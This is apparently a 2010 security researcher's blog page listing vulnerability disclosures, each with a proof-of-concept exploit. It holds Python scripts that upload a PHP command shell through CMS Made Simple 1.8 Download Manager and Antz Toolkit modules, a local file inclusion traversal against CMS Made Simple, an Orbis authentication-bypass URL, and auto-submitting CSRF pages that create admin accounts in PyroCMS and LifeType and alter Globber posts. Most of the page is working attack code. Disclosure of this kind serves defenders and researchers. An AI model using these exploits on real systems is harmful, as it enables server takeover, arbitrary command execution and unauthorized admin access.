This site is soon to be deprecated by http://www.johnleitch.net

Sunday, July 11, 2010

CMS Made Simple 1.8 Download Manager 1.4.1 Module Arbitrary Upload

An arbitrary upload vulnerability in CMS Made Simple 1.8 Download Manager 1.4.1 Module can be exploited to upload a PHP shell.

PoC
import socket, re

host = 'localhost'
path = '/cmsms'
port = 80

def upload_shell():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.settimeout(8)

s.send('POST ' + path + '/modules/DownloadManager/lib/simple-upload/example.php HTTP/1.1\r\n'
'Host: localhost\r\n'
'Proxy-Connection: keep-alive\r\n'
'User-Agent: x\r\n'
'Content-Length: 189\r\n'
'Cache-Control: max-age=0\r\n'
'Origin: null\r\n'
'Content-Type: multipart/form-data; boundary=----x\r\n'
'Accept: text/html\r\n'
'Accept-Encoding: gzip,deflate,sdch\r\n'
'Accept-Language: en-US,en;q=0.8\r\n'
'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n'
'\r\n'
'------x\r\n'
'Content-Disposition: form-data; name="file"; filename="shell.php"\r\n'
'Content-Type: application/octet-stream\r\n'
'\r\n'
'<?php echo \'<pre>\' + system($_GET[\'CMD\']) + \'</pre>\'; ?>\r\n'
'------x--\r\n'
'\r\n')

resp = s.recv(8192)

http_ok = 'HTTP/1.1 200 OK'

if http_ok not in resp[:len(http_ok)]:
print 'error uploading shell'
return
else: print 'shell uploaded'

shell_path = path + '/modules/DownloadManager/lib/simple-upload/'\
+ re.search(u'shell_[^.]+\.php', resp).group(0)

s.send('GET ' + shell_path + ' HTTP/1.1\r\n'\
'Host: ' + host + '\r\n\r\n')

if http_ok not in s.recv(8192)[:len(http_ok)]: print 'shell not found'
else: print 'shell located at http://' + host + shell_path

upload_shell()

CMS Made Simple 1.8 Antz Toolkit 1.02 Module Arbitrary Upload

An arbitrary upload vulnerability in CMS Made Simple 1.8 Antz Toolkit 1.02 Module can be exploited to upload a PHP shell.

PoC
import socket

host = 'localhost'
path = '/cmsms'
port = 80

def upload_shell():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.settimeout(8)

s.send('POST ' + path + '/include.php HTTP/1.1\r\n'
'Host: localhost\r\n'
'Proxy-Connection: keep-alive\r\n'
'User-Agent: x\r\n'
'Content-Length: 257\r\n'
'Cache-Control: max-age=0\r\n'
'Origin: null\r\n'
'Content-Type: multipart/form-data; boundary=----x\r\n'
'Accept: text/html\r\n'
'Accept-Encoding: gzip,deflate,sdch\r\n'
'Accept-Language: en-US,en;q=0.8\r\n'
'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n'
'\r\n'
'------x\r\n'
'Content-Disposition: form-data; name="antzSeed"\r\n'
'\r\n'
'\r\n'
'------x\r\n'
'Content-Disposition: form-data; name="shell_file"; filename="shell.php"\r\n'
'Content-Type: application/octet-stream\r\n'
'\r\n'
'<?php echo \'<pre>\' + system($_GET[\'CMD\']) + \'</pre>\'; ?>\r\n'
'------x--\r\n'
'\r\n')

resp = s.recv(8192)

s.close()

http_ok = 'HTTP/1.1 200 OK'

if http_ok not in resp[:len(http_ok)]:
print 'error uploading shell'
return
else: print 'shell uploaded'

print 'searching or shell'

for i in range(0, 9999):

shell_path = path + '/modules/antz/tmp/' + str(i) + 'shell.php'

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.settimeout(8)

s.send('GET ' + shell_path + ' HTTP/1.1\r\n'\
'Host: ' + host + '\r\n\r\n')

if http_ok in s.recv(8192)[:len(http_ok)]:
print '\r\nshell located at http://' + host + shell_path
break
else:
print '.',

upload_shell()

CMS Made Simple 1.8 Local File Inclusion

A local file inclusion vulnerability in CMS Made Simple 1.8 can be exploited to include arbitrary files.

PoC
import httplib, urllib

host = 'localhost'
path = '/cmsms'

lfi = '../' * 32 + 'windows/win.ini\x00'

c = httplib.HTTPConnection(host)
c.request('POST', path + '/admin/addbookmark.php',
urllib.urlencode({ 'default_cms_lang': lfi }),
{ 'Content-type': 'application/x-www-form-urlencoded' })
r = c.getresponse()

print r.status, r.reason
print r.read()

Orbis 1.0.2 Authentication Bypass

An authentication bypass vulnerability in Orbis 1.0.2 can be exploited to create a new admin.

Exploit
Several admin related scripts fail to terminate after setting the header location field.


PoC
http://localhost/orbis/admin/admin_users_create.php?nusern=new_admin&nuserp=Password1&nusert=2&nusere=@

PyroCMS 0.9.9.1 Cross-site Request Forgery

A cross-site request forgery vulnerability in PyroCMS 0.9.9.1 can be exploited to create a new admin.

PoC
<html>
<body onload="document.forms[0].submit()">
<form method="POST" action="http://localhost/pyrocms/index.php/admin/users/create">
<input type="hidden" name="first_name" value="a" />
<input type="hidden" name="last_name" value="a" />
<input type="hidden" name="email" value="new_admin@x.com" />
<input type="hidden" name="username" value="new_admin" />
<input type="hidden" name="display_name" value="a" />
<input type="hidden" name="group" value="admin" />
<input type="hidden" name="active" value="1" />
<input type="hidden" name="password" value="Password1" />
<input type="hidden" name="confirm_password" value="Password1" />
<input type="hidden" name="btnAction" value="save" />
</form>
</body>
</html>

LifeType 1.2.10 Cross-site Request Forgery

A cross-site request forgery vulnerability in LifeType 1.2.10 can be exploited to create a new admin.

PoC
<html>
<body>
<img src="http://localhost/lifetype-1.2.10/admin.php?userName=newadmin&userFullName=&newUserPassword=Password1&userEmail=a%40a.com&userStatus=1&blogId=1&blogName=asdfasdfs&userPermissions%5B49%5D=49&userPermissions%5B58%5D=58&userPermissions%5B52%5D=52&userPermissions%5B43%5D=43&userPermissions%5B46%5D=46&userPermissions%5B55%5D=55&userPermissions%5B39%5D=39&userPermissions%5B41%5D=41&userPermissions%5B1%5D=1&userPermissions%5B66%5D=66&userPermissions%5B65%5D=65&userPermissions%5B51%5D=51&userPermissions%5B60%5D=60&userPermissions%5B62%5D=62&userPermissions%5B54%5D=54&userPermissions%5B45%5D=45&userPermissions%5B64%5D=64&userPermissions%5B48%5D=48&userPermissions%5B57%5D=57&userPermissions%5B42%5D=42&userPermissions%5B50%5D=50&userPermissions%5B59%5D=59&userPermissions%5B61%5D=61&userPermissions%5B53%5D=53&userPermissions%5B44%5D=44&userPermissions%5B63%5D=63&userPermissions%5B47%5D=47&userPermissions%5B56%5D=56&userPermissions%5B40%5D=40&Add+User=Add&op=addUser" />
</body>
</html>

Globber 1.4 Cross-site Request Forgery

A cross-site request forgery vulnerability in Globber can be exploited
to add and delete blog posts.

PoC
<!-- Add (note that blog also must be "rebuilt") -->
<html>
<body onload="document.forms[0].submit()">
<form method="POST" action="http://localhost/globber/admin.php?task=edit&c=Misc&a=new-article">
<input type="hidden" name="title" value="New Article" />
<input type="hidden" name="date" value="06-07-2010 10:16 pm" />
<input type="hidden" name="tags" value="" />
<input type="hidden" name="content" value="&lt;script&gt;alert(0)&lt;/script&gt;" />
</form>
</body>
</html>

<!-- Delete -->
<html>
<body>
<img src="http://localhost/globber/admin.php?task=articles&delc=Misc&dela=first-post" />
</body>
</html>